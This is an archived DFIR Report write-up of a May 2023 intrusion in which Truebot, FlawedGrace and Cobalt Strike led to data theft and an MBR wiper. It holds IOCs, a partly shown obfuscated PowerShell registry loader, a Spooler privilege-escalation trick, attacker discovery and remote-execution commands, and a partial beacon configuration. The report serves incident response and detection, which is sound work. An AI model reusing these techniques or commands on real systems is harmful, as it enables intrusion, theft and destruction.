{ "id": "3d3eec60-08ec-4bb4-9fcb-6216773fcdbb", "created_at": "2026-04-06T00:08:50.535112Z", "updated_at": "2026-04-10T13:11:34.14273Z", "deleted_at": null, "sha1_hash": "64df87cac686a9d3f82ec3e06e6364718b9afeb1", "title": "A Truly Graceful Wipe Out - The DFIR Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5740285, "plain_text": "A Truly Graceful Wipe Out - The DFIR Report\r\nBy editor\r\nPublished: 2023-06-12 · Archived: 2026-04-05 13:18:39 UTC\r\nIn this intrusion, dated May 2023, we observed Truebot being used to deploy Cobalt Strike and FlawedGrace (aka\r\nGraceWire \u0026 BARBWIRE) resulting in the exfiltration of data and the deployment of the MBR Killer wiper. The threat\r\nactors deployed the wiper within 29 hours of initial access.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nIn this case, Truebot was delivered through a Traffic Distribution System (TDS) reported by Proofpoint as “404 TDS”. This\r\ncampaign, observed in May 2023, leveraged email for the initial delivery mechanism. After clicking-through the link in an\r\nemail, the victim would be redirected through a series of URLs before being presented a file download at the final landing\r\npage.\r\nThe file download was a Truebot executable, which appeared as a fake Adobe Acrobat document. After executing the file,\r\nTruebot copied and renamed itself. Minutes later, Truebot loaded FlawedGrace onto the host. While loading this malware, it\r\nused a series of modifications to the registry and Print Spooler service to both escalate privileges and establish persistence.\r\nFrom there, FlawedGrace’s execution routine involved storing as well as extracting, encoded and encrypted payloads in\r\nregistry; the creation of temporary scheduled tasks and the injection of the final payload into msiexec.exe and svchost.exe.\r\nAfter this execution, the threat actors proceeded to disable Windows Defender Real-Time monitoring and added exclusions\r\nfor executable files on the host. We later observed FlawedGrace creating a temporary user within the local Administrators\r\nand Remote Desktop Users groups. With this user, a tunneled RDP connection was attempted from FlawedGrace’s C2\r\nservers. Seemingly without success, the threat actors removed the user after 15 minutes before repeating the procedure a\r\nsecond time. After the second failed attempt, the threat actors removed the user and did not attempt further RDP\r\ncommunications. The FlawedGrace process then performed discovery surrounding the domain administrators and domain\r\ncontrollers.\r\nApproximately two hours after the initial execution, Truebot loaded Cobalt Strike into memory and then went dormant for\r\nthe next two hours. This ended the use of Truebot for the rest of the intrusion, with FlawedGrace and Cobalt Strike being\r\nleveraged for the rest of the threat actors activity. Now, four hours into the intrusion the threat actors, through the Cobalt\r\nStrike beacon, started another round of discovery commands using net, nltest, tasklist and AdFind.exe.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 1 of 36\n\nAfter having accessed LSASS memory on the beachhead host, the threat actors leveraged a local administrator hash to\r\nperform pass-the-hash lateral movement through the environment. The threat actors used Impacket’s atexec to execute\r\ndiscovery commands on remote hosts. These discovery commands included the PowerShell, cmdlet Get-MpComputerStatus,\r\nand quser. After these discovery commands, the threat actors used Cobalt Strike’s jump psexec module to further move\r\nbetween hosts. Following each lateral movement action, Cobalt Strike loaded FlawedGrace in memory on all hosts accessed\r\nby the adversary.\r\nAround five hours post initial access, the threat actors went silent. FlawedGrace and Cobalt Strike went dormant on all hosts\r\nexcept the beachhead system. Seventeen hours later, the threat actors returned to the network and issued enumeration\r\ncommands to discover network shares. Around that time, we observed signs of data exfiltration from the environment.\r\nRoughly four hours after the exfiltration began, merely 29 hours into the intrusion, the threat actors deployed the MBR\r\nKiller wiper on all hosts where FlawedGrace had been running, including a file server. This executable overwrote the MBR\r\n(Master Boot Record) and triggered a reboot, rendering the hosts unusable. Numerous systems were left at the boot screen,\r\ninoperable.\r\nFollowing these actions, the threat actors lost all footholds to the network. While data has been exfiltrated, no responsibility\r\nhas been claimed and no extortion notes were found.\r\nAttribution\r\nTruebot (a.k.a. Silence.Downloader) has been attributed to the Silence group which have had long standing interactions with\r\nfinancially motivated criminal group TA505 (spammer/distribution). The FlawedGrace malware has been reportedly\r\nassociated, but not exclusive, to TA505, and has commonly been distributed by Truebot.\r\nMost recently, an activity group reported by Microsoft as Lace Tempest was observed running a Cl0p extortion operation.\r\nAccording to Microsoft “Lace Tempest (DEV-0950) is a Clop ransomware affiliate that has been observed using\r\nGoAnywhere exploits and Raspberry Robin infection hand-offs in past ransomware campaigns.”\r\n“Lace Tempest operates in two modes. One mode where they deploy Cl0p enterprise wide and the other where\r\nthey do mass exploitation against file transfer servers – and steal data (and possibly deploy mbrkiller). Both sets\r\nof victims show up on Cl0p leak site. Even if the ransom payload wasn’t deployed.”\r\n– Christopher Glyer, Principal Security Researcher with Microsoft Threat Intelligence\r\nThe MBR Killer binary in this case was attributed to the Lace Tempest activity group per Microsoft. Microsoft also recently\r\nattributed the MOVEit Transfer 0-day (CVE-2023-34362) exploitation to Lace Tempest.\r\nAccording to Mandiant, in January 2023 FIN11 was observed deploying TRUECORE (a version of Truebot) and\r\nBARBWIRE (FlawedGrace) after exploiting a SolarWinds Serv-U server (CVE-2021-35211). During this time,\r\nBARBWIRE C2 was communicating with 5.188.86[.]18:443, which we observed in this case. In April, Mandiant again\r\nobserved BARBWIRE C2 communicating to 5.188.86[.]18:443 as well as 92.118.36[.]199:443, which was also observed\r\nduring this case. During this time period, Mandiant also noted that shellcode payloads were staged on a TRUECORE C2\r\nserver, which pointed to 5.188.206[.]78, the Cobalt Strike server in this case. Mandiant also confirmed that they’ve observed\r\nFIN11 using MBR Killer as early as 2019. According to Mandiant, FIN11 has used BARBWIRE since at least 2018, and\r\nthey believe that the backdoor is exclusive to the threat group. Mandiant also recently attributed the MOVEit Transfer 0-day\r\n(CVE-2023-34362) exploitation to FIN11.\r\nDue to the overlap of TTPs, we are attributing this intrusion with high confidence to Lace Tempest and FIN11 with possible\r\nTA505 overlaps.\r\nAnalysts\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 2 of 36\n\nAnalysis and reporting by @Kostastsale, @svch0st and @0xThiebaut.\r\nInitial Access\r\nAs is the case for many intrusions, initial access was obtained through an email campaign. Reports by Proofpoint point to\r\nthis campaign using the 404 Traffic Distribution System (TDS) service. The following Proofpoint screenshots highlight how\r\n“404 TDS” is leveraged to turn email campaigns into drive-by downloads.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 3 of 36\n\nDuring this intrusion, the TDS redirection was reported by Proofpoint as follows:\r\n1. hxxps[:]//hrcbishtek[.]com/{5 alphanumeric characters}\r\n2. hxxps[:]//imsagentes[.]pe/dgrjfj\r\n3. hxxps[:]//imsagentes[.]pe/dgrjfj/\r\n4. hxxps[:]//ecorfan[.]org/base/sj/Document_may_24_16654.exe\r\nThe resulting hxxps[://]ecorfan[.]org/base/sj/Document_may_24_16654[.]exe URL performed a drive-by download,\r\ndelivering the initial Truebot payload Document_may_24_16654.exe.\r\nThe usage of the deceptive Document_may_24_16654.exe naming would then entice fooled users to open what they believe\r\nis a recent document.\r\nExecution\r\nTruebot was used to load both Cobalt Strike and FlawedGrace on the initial host.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 4 of 36\n\nTruebot\r\nThe payload, Document_may_24_16654.exe, imitated a PDF document by using an icon of an Adobe Acrobat document.\r\nThis was further enforced upon the user when the malware created the following message claiming Adobe Acrobat failed to\r\nopen the file (even if Acrobat was not installed on the target system).\r\nTruebot’s first action was to create an exact copy of itself in the following path and then execute it.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 5 of 36\n\nC:\\Intel\\RuntimeBroker.exe\r\nThe newly created copy reached out to the Truebot C2 of essadonio[.]com (45.182.189[.]71).\r\nCobalt Strike\r\nTruebot spawned an instance of C:\\Windows\\system32\\cmd.exe which was followed-up by a remote thread created in the\r\nnew process. The memory of cmd.exe clearly indicated signs of injection, as seen below, where a section of memory was set\r\nto execute and read write as well as the telltale MZ (0x4d5a) header of a PE binary.\r\nFurther investigation identified the injected module beacon.dll at the same offset as above (0x164a2fb0000) in the loaded\r\nmodules of the target process.\r\nThis is the default naming convention for generating payloads from Cobalt Strike, and stands out further as the DLL did not\r\nhave a path on disk.\r\nThis Cobalt Strike beacon was used both to query information and move around the network which will be discussed in later\r\nsections.\r\nDuring the intrusion, the process running the beacon spawned the following process command line:\r\nping -n 1 \u003cREDACTED\u003eshell wmic /node:\u003cREDACTED\u003e process get executablepath\r\nAs we have observed in previous cases, threat actors make mistakes too! In this case, the shell argument is a beacon\r\ncommand to spawn a new process. Here, we see it mashed between two commands indicating human error.\r\nFlawedGrace\r\nTruebot loaded another more complicated payload alongside Cobalt Strike, the Remote Access Trojan (RAT)\r\n“FlawedGrace.” The initial execution chain of this malware was observed across multiple endpoints when they were first\r\ninfected.\r\nThe first observed behavior of this chain was to create a new instance of spoolsv.exe that was shortly accessed by the\r\nTruebot process (RuntimeBroker.exe). This process would then spawn instances of msiexec.exe, which would reach out to\r\nthe initial FlawedGrace C2 of 92.118.36[.]199.\r\nInstead of creating a task through schtasks.exe, FlawedGrace used three different methods to create new scheduled tasks.\r\nThe first was to import the taskschd.dll library into the main host process to create a new task called 2. The task was\r\nremoved as soon as the new command gained SYSTEM-level privileges.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 6 of 36\n\nThe second was observed within obfuscated PowerShell, where the Schedule.Service COM Object was used to create a new\r\ntask.\r\nThe last method was to use native PowerShell cmdlets to register a task.\r\nThe initial task \\2 ran the following command which was scheduled for the next minute after creation:\r\npowershell -c \"\u0026{(-join('246A3D277B38443831363736432D374636332D384638312D363736452D3636364236433637383138447D2\r\nThe first working part of the command decodes the obfuscated string and results in the following PowerShell code:\r\n$j='{8D81676C-7F63-8F81-676E-666B6C67818D}';([Text.Encoding]::UTF8.GetString((gp ('hklm:\\\\software\\\\2\\\\clsid\\\\\r\nThe decoded code sets the variable $j to the value {8D81676C-7F63-8F81-676E-666B6C67818D}. It then reads a value\r\nfrom the Windows Registry under the SOFTWARE\\2\\CLSID\\{8D81676C-7F63-8F81-676E-666B6C67818D}\\Type key,\r\nconverts the value to a UTF-8 string, and executes it.\r\nBased on script block logging, the PowerShell script contained in the registry would manipulate and populate further\r\nregistry keys in the HKLM:\\Software\\Classes\\CLSID\\ key using HKLM:\\Software\\2\\CLSID as a staging location. The\r\nmalware created specific key names attempting to blend in with other COM objects which were also kept within this\r\nlocation. The malware would create additional scheduled tasks using one of the following names selected randomly:\r\n\\Microsoft\\Windows\\System diagnostics service\r\n\\Microsoft\\Windows\\System diagnostics monitor\r\n\\Microsoft\\Windows\\System monitor\r\n\\Microsoft\\Windows\\System service\r\nThe final loaded PowerShell script was stored here:\r\nHKLM\\Classes\\CLSID\\{8D81676C-7F63-8F81-676E-666B6C67818D}\\TypeLib\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 7 of 36\n\nThe PowerShell code in TypeLib would decrypt the RC4 encrypted payload stored in ProgID using a key based on the\r\nhostname ($env:COMPUTERNAME) of the target host and then inject the DLL into the FlawedGrace msiexec.exe and\r\nsvchost.exe processes.\r\nThe encrypted DLL stored in Registry\r\nWe manually reversed the RC4 function to decrypt the DLL, which matched the same hash as the FlawedGrace processes in\r\nmemory (c.dll)\r\nThe PE details of the injected module c.dll was of a DLL with an original name of icuin.dll, claiming to be part of the\r\nInternational Components for Unicode libraries, as see below:\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 8 of 36\n\nWhen FlawedGrace attempted to run certain commands on the target host, it displayed the specific behavior of spawning an\r\ninstance of cmd.exe as a sacrificial intermediate process.\r\nShortly after these instances of cmd.exe were spawned, they would be accessed by the FlawedGrace process svchost.exe.\r\nOf note, the arguments in these processes command lines used flags that do not exist (/I, /SI, /O, /SO):\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 9 of 36\n\nA Sigma rule to detect this activity can be found at the end of the report.\r\nPersistence\r\nThreat actors established persistence on all infected hosts they pivoted to in the network. The scheduled tasks were\r\nconfigured to load FlawedGrace using PowerShell. While the tasks created initially to run FlawedGrace were registered with\r\nthe task name of \\2 , tasks created for persistence used a naming convention mimicking various system tasks and placed\r\nunder the \\Microsoft\\Windows\\ task path.\r\n\\Microsoft\\Windows\\System diagnostics monitor\r\n\\Microsoft\\Windows\\System monitor\r\n\\Microsoft\\Windows\\System service\r\nThese tasks were then set up for a BootTrigger to restart the malware.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 10 of 36\n\nPlease refer to the “FlawedGrace” portion of the Execution section for details on the different execution methods threat\r\nactors used to register these scheduled tasks.\r\nOn the beachhead host, the threat actors added a user account named adminr. This account was then added to the Local\r\nAdministrators group and Remote Desktop Users group. The account was observed being used to test RDP tunneling in the\r\nenvironment. This account was added and removed several times, but after the first three hours of access, it was deleted and\r\nnot re-added by the threat actors.\r\nPrivilege Escalation\r\nWe believe that to elevate their privileges, the threat actor might have abused an odd default Windows behavior surrounding\r\nchanging service permissions:\r\nThe change in required [service] privileges takes effect the next time the service is started. […] If you do not set\r\nthe required privileges, the SCM uses all the privileges assigned by default to the process token. – Source\r\nTo abuse this SCM behavior, the threat actors were seen stopping the Spooler service before deleting the service’s\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Spooler\\RequiredPrivileges registry entry, restarting the\r\nservice and injecting into the newly created spoolsv.exe process.\r\nThe effect of deleting the RequiredPrivileges registry entry can be observed in the following screenshots where the post-modification spoolsv.exe process is seen with a flurry of additional permissions, all of which the threat actors may enjoy\r\npost-injection.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 11 of 36\n\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 12 of 36\n\nScheduled tasks were used by the threat actors to run much of their malware as SYSTEM. The initial execution tasks for\r\nFlawedGrace used the \\2 registered task were created to run under SYSTEM as seen by the Author in the task details.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 13 of 36\n\nThis could then be seen with the user NT AUTHORITY\\SYSTEM running the task command and arguments in process\r\ncreation logs.\r\nDefense Evasion\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 14 of 36\n\nShortly after execution, the Truebot malware copied the initial malware to a new location renaming itself to\r\nRuntimeBroker.exe, masquerading as an executable responsible for managing certain application permissions.\r\nAs covered in the execution section, FlawedGrace uses a number of techniques to perform evasion, including encoding,\r\nencryption, and storing payloads in the registry. When executing, command-line data was encoded. See the Execution\r\nsection for a breakdown of the encoding.\r\nDuring runtime, the FlawedGrace malware decrypts the RC4 encrypted registry stored payload:\r\nWe observed process injection by all three malware families in this intrusion. First, Truebot used it to inject the Cobalt Strike\r\npayload into a cmd.exe process.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 15 of 36\n\nReviewing memory dumps, the injected MZ header for the Cobalt Strike beacon is easily observable in the injected cmd.exe\r\nprocess.\r\nCobalt Strike was not the only injection with observable headers, each svchost.exe and msiexec.exe also contained telltale\r\ninjection signs like PAGE_EXECUTE_READWRITE protection and MZ file headers.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 16 of 36\n\nStandard Cobalt Strike named pipes using the postex_* patterns were observed throughout the intrusion.\r\n\\postex_0c2a\r\n\\postex_e3dc\r\n\\postex_7c32\r\n\\postex_8e03\r\n\\postex_f3cc\r\n\\postex_56b2\r\n\\postex_8c98\r\n\\postex_6ab5\r\n\\postex_7e1e\r\n\\postex_982c\r\n\\postex_a34b\r\n\\postex_7007\r\n\\postex_9e6a\r\n\\postex_ec79\r\n\\postex_5ef6\r\n\\postex_a195\r\n\\postex_10a9\r\n\\postex_511b\r\n\\postex_ffda\r\n\\postex_464b\r\n\\postex_dbf3\r\n\\postex_eb5d\r\n\\postex_1276\r\n\\postex_181d\r\n\\postex_8c48\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 17 of 36\n\nSome Registry Items were removed during the FlawedGrace PowerShell execution, specifically the items stored in\r\nHKLM:\\SOFTWARE\\2\\:\r\nFile removal was observed with AdFind.exe being removed by the threat actors as well as Cobalt Strike beacon removal,\r\nafter being used for lateral movement.\r\nCredential Access\r\nApproximately one hour after the initial infection, we observed the threat actors using a remote dumping tool to extract\r\ncredentials via the registry hives. At this time, we cannot confidently name the tool that they used. The logs of the credential\r\naccess activity resemble those of secretsdump, which is a tool that is part of the Impacket library.\r\nWe noticed the creation of two temporary files in the C:\\Windows\\System32\\ directory. The names of these files consisted of\r\neight randomly generated characters. Prior to that, a service called “RemoteRegistry” was instructed to start. The Remote\r\nRegistry allows administrators to access, modify, and manage the registry settings of other computers on a network. Once\r\nagain, an example of this approach can be seen through secretsdump (secretsdump.py#L374).\r\nWe believe that the threat actors utilized an older version of the impacket Library. This is because as of May 4th, 2023,\r\nversion 0.10.0 modified the location where the registry hives would extract. They are now saved as temp files under\r\nC:\\Windows\\Temp directory. However, as with this case, we observed the temp files under C:\\Windows\\System32, which\r\nindicates the use of an older version of impacket.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 18 of 36\n\nAfter reviewing the Security event logs for event ID 4624 and the Sysmon event logs (event ID 1 \u0026 10) on the beachhead\r\nhost, we have determined that the attackers utilized Pass-The-Hash to run commands on remote hosts as the local\r\nadministrator user.\r\nSecurity Logs Sysmon Logs\r\n4624 – LogonType: 9LogonProcess: seclogo 1 – Cobalt Strike Execution\r\n  10 – Cobalt Strike Accessing LSASS Process\r\nWhen considering this evidence, the time sequence is a crucial factor. To prevent false positives, defenders can group related\r\nevents together based on their time of execution. However, we have also included specific Sigma rules that are capable of\r\nidentifying these execution patterns in isolation. Please refer to these rules in the Detections section of this report.\r\nDiscovery\r\nWe also observed the threat actors utilizing for loops to iterate through text files located in the C:\\ProgramData directory.\r\nThese files contained the hostname of all workstations and servers within the network environment. The aim of this loop\r\nwas to execute discovery commands using ping to locate live endpoints and net view to enumerate their open shares. In\r\naddition, they used the dir command to test the feasibility of connecting to remote servers within the network through the\r\nlocal administrator’s account.\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\servers_live.txt) do net view \\\\%i /all \u003e\u003e C:\\Prog\r\nC:\\Windows\\system32\\cmd.exe /C for /f %%i in (C:\\ProgramData\\servers_live.txt) do dir \\\\%%i\\C$ \u003e\u003e C:\\ProgramDa\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\hosts.txt) do ping -n 1 %i -v 4 | find /I \"TTL\" \u003e\u003e\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\servers.txt) do ping -n 1 %i -v 4 | find /I \"TTL\"\r\nIn addition to using net view to find open shares, the attackers also examined the registry of the local host and saved a list of\r\nall mapped shares in a text file called 1.txt. We also observed them using the wmic command to execute the same action on a\r\nremote host.\r\ncmd /C \u003e C:\\ProgramData\\1.txt 2\u003e\u00261 reg query HKEY_USERS\\\\\u003cSID\u003e\\Network\r\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\u003cREDACTED\u003e process call create \"cmd /C \u003e C:\\ProgramData\\1.txt 2\u003e\u00261 r\r\nThey later viewed and deleted the text file using the type and del commands respectively.\r\nTo check the status of the antimalware software that is installed, they used PowerShell along with the Get-MpComputerStatus cmdlet. This command was run on multiple hosts in the environment. We believe the execution of this\r\ncommand came through atexec.py, which is part of the impacket collection.\r\ncmd.exe /C powershell Get-MpComputerStatus \u003e C:\\Windows\\Temp\\KMzFGwGn.tmp 2\u003e\u00261\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 19 of 36\n\nAdFind was used in this intrusion, however, the threat actors limited the output only to collect operating system information\r\nand specific attributes from the domain user objects.\r\nC:\\Windows\\system32\\cmd.exe /C AdFind.exe -f \"\u0026(objectcategory=computer)\" operatingSystem -csv \u003e 1.csv\r\nC:\\Windows\\system32\\cmd.exe /C AdFind.exe -f \"objectcategory=person\" sAMAccountName name displayName givenName\r\nWe also observed some other miscellaneous commands that we tend to see in every intrusion. These discovery commands\r\ncollected information about the administrator groups and users. Although, there was one notable use of the tasklist command\r\nwhere threat actors used the /S parameter to retrieve the list of currently running processes from remote hosts.\r\nquser\r\nnet group \"Domain Admins\" /domain\r\nnet group \"Domain Controllers\" /domain\r\nnet group /domain\r\nnet localgroup \"Remote Desktop Users\"\r\nnet localgroup Administrators\r\nnet user \u003cuser\u003e /domain\r\nnltest /domain_trusts\r\ntasklist /S \u003cIP of remote host\u003e\r\nLateral Movement\r\nThe threat actors predominately used Cobalt Strike’s jump psexec module to move to new hosts. The event ID 7045 (A new\r\nservice was installed in the system) in System.evtx showed clear evidence of the malicious service being installed.\r\nThe DFIR Report’s defender’s guide to Cobalt Strike discusses this in further detail.\r\nAs seen below, when filtered to these events, we observed the threat actor moving to a new system every 5-20 minutes.\r\nAs we mentioned in the discovery phase, threat actors also used atexec to execute commands on remote hosts. Impacket’s\r\natexec module allows the remote execution of commands on a Windows system by leveraging the Task Scheduler service.\r\nThe module registers a task on a remote system that would execute the instructed command. The task would then be deleted\r\nupon successful execution. The example below is from the Security event logs, event ID 4698.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 20 of 36\n\nTo showcase the hardcoded lines of code responsible for the observed execution flow, we have included a snippet from\r\natexec’s official GitHub page in the screenshot above. Threat actors used Cobalt Strike to facilitate the execution of this\r\nmodule.\r\nIn some other cases, we saw threat actors executing the below command from the beachhead host toward a number of\r\nremote hosts.\r\ncmd.exe /C wmic /node:\u003cremote host\u003e process get executablepath\r\nThis command uses Windows Management Instrumentation CommandLine (WMIC) to remotely retrieve the executable\r\npaths of all running processes from a number of remote hosts.\r\n1. /node:\u003cremote host\u003e: specifies the remote host.\r\n2. process: represents the WMI class to be queried; in this case, it’s related to running processes on the target system.\r\n3. get executablepath: is to retrieve the property ‘ExecutablePath’, which contains the complete path to the executable\r\nfor each running process.\r\nWe’ve created a chart displaying the times (UTC) when threat actors were active in the network. The data is based on a\r\nsample of affected hosts, but the pattern of activity remained consistent throughout the intrusion.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 21 of 36\n\nCollection\r\nThroughout the intrusion, the attackers staged results from their discovery within either the temporary directory or\r\nC:\\ProgramData. As a reminder, the following discovery commands redirected their results to C:\\ProgramData\\hosts_live.txt\r\nand C:\\ProgramData\\servers_live.txt.\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\hosts.txt) do ping -n 1 %i -v 4 | find /I \"TTL\" \u003e\u003e\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\servers.txt) do ping -n 1 %i -v 4 | find /I \"TTL\"\r\nAdditionally, populated and collected files included:\r\nC:\\ProgramData\\1.txt\r\nC:\\Windows\\Temp\\KMzFGwGn.tmp\r\nC:\\ProgramData\\1.csv\r\nC:\\ProgramData\\person.csv\r\nC:\\ProgramData\\servers_live_dir.txt\r\nThe extensive creation of text files (.txt and .csv) within the C:\\ProgramData directory provides detection and hunting\r\nopportunities as legitimate software commonly leverages sub-folders of this directory.\r\nCommand and Control\r\nTruebot\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 22 of 36\n\nCommunication to the Truebot C2 server at 45.182.189[.]71 began shortly after the execution of the initial access\r\nexecutable. This connection, however, only lasted for around two hours on the beachhead host, and activity ceased after the\r\nCobalt Strike beacon payload was loaded on the host.\r\nDomain IP Port JA3 JA3s\r\nessadonio[.]com 45.182.189[.]71 443 a0e9f5d64349fb13191bc781f81f42e1 f14f2862ee2df5d0f63a88b60c8eee\r\nessadonio[.]com 45.182.189[.]71 443 a0e9f5d64349fb13191bc781f81f42e1 f33734dfbbff29f68bcde052e523c2\r\nCertificate: [39:d7:cf:9d:0a:39:f6:b6:e4:cc:af:2e:34:9e:07:48:48:be:d1:ea]\r\nNot Before: 2023/05/18 00:00:00 UTC\r\nNot After: 2023/08/16 23:59:59 UTC\r\nIssuer Org: ZeroSSL\r\nSubject Common: essadonio.com [essadonio.com ,www.essadonio.com]\r\nPublic Algorithm: id-ecPublicKey\r\nCurve prime: 256v1\r\nJARM: 28d28d28d00028d00042d42d0000005a3e96c1dfa4bdb24b8b3c04cae18cc3\r\nLooking at memory collected from the beachhead host, we can observe the connection to the Truebot command and control\r\nserver made by Runtimebroker.exe, the renamed executable copied from the initial malware payload.\r\nFlawed Grace\r\nThe FlawedGrace malware is unlike any command and control we’ve covered in previous reports as it uses a custom binary\r\nprotocol as opposed to the more common usage of application layer protocols like HTTP/s, RDP, or SSH.\r\nOver the course of the intrusion, the threat actors pivoted to several command and control addresses with times of overlap\r\nbetween several C2 addresses. This activity took place several times over the course of the intrusion.\r\nAs well as pivoting between command and control servers, the threat actors started communication from various hosts over\r\nthe course of the intrusion with no host maintaining constant beaconing.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 23 of 36\n\nAs this malware uses a custom protocol, normal indicators like SSL certificate or JA3 were not present.\r\nIP Port\r\n81.19.135[.]30 443\r\n92.118.36[.]199 443\r\n5.188.86[.]18 443\r\nTraces of command and control activity were present in memory on several hosts from the beachhead to multiple servers.\r\nMost no longer showed the responsible process, but at least one host had an active connection from an injected svchost.exe\r\nprocess to FlawedGrace command and control visible.\r\nDuring the first day of the intrusion, we observed a network signature hit for RDP tunneling from one of the FlawedGrace\r\ncommand and control servers, but due to no follow-up activity, it would appear that this did not function properly for the\r\nthreat actors.\r\nSignature Source IP\r\nET POLICY Tunneled RDP msts Handshake 92.118.36[.]199\r\nThis likely also explains the removal of the local user account that had been added to the Remote Desktop Users group.\r\nCobalt Strike\r\nCobalt Strike, unlike the other two malware families observed, remained in constant communication with its command and\r\ncontrol server after the first beacon was loaded until the end of the intrusion.\r\nWhile the Cobalt Strike command and control stayed active over the intrusion the threat actors did selectively deploy and\r\nremove it on hosts with only the beachhead host maintaining beaconing activity for the whole duration.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 24 of 36\n\nIP Port JA3 JA3s\r\n5.188.206[.]78 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7\r\nCertificate: [6e:ce:5e:ce:41:92:68:3d:2d:84:e2:5b:0b:a7:e0:4f:9c:b7:eb:7c]\r\nNot Before: 2015/05/20 18:26:24 UTC\r\nNot After: 2025/05/17 18:26:24 UTC\r\nIssuer Org:\r\nSubject Common:\r\nSubject Org:\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike beacon configuration:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 60000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 16777216,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 1580103824,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"5.188.206.78\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCpq+thntRoA67IEQOJ9T8JfpepBXCrOX43GMXPArNSegjOtHm8eQ79\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/ga.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n }\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 25 of 36\n\n},\r\n \"http-post\": {\r\n \"uri\": \"/submit.php\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 0,\r\n \"startrwx\": true,\r\n \"stub\": \"ezN0tALmJbn0hY8yMkftaA==\",\r\n \"transform-x86\": null,\r\n 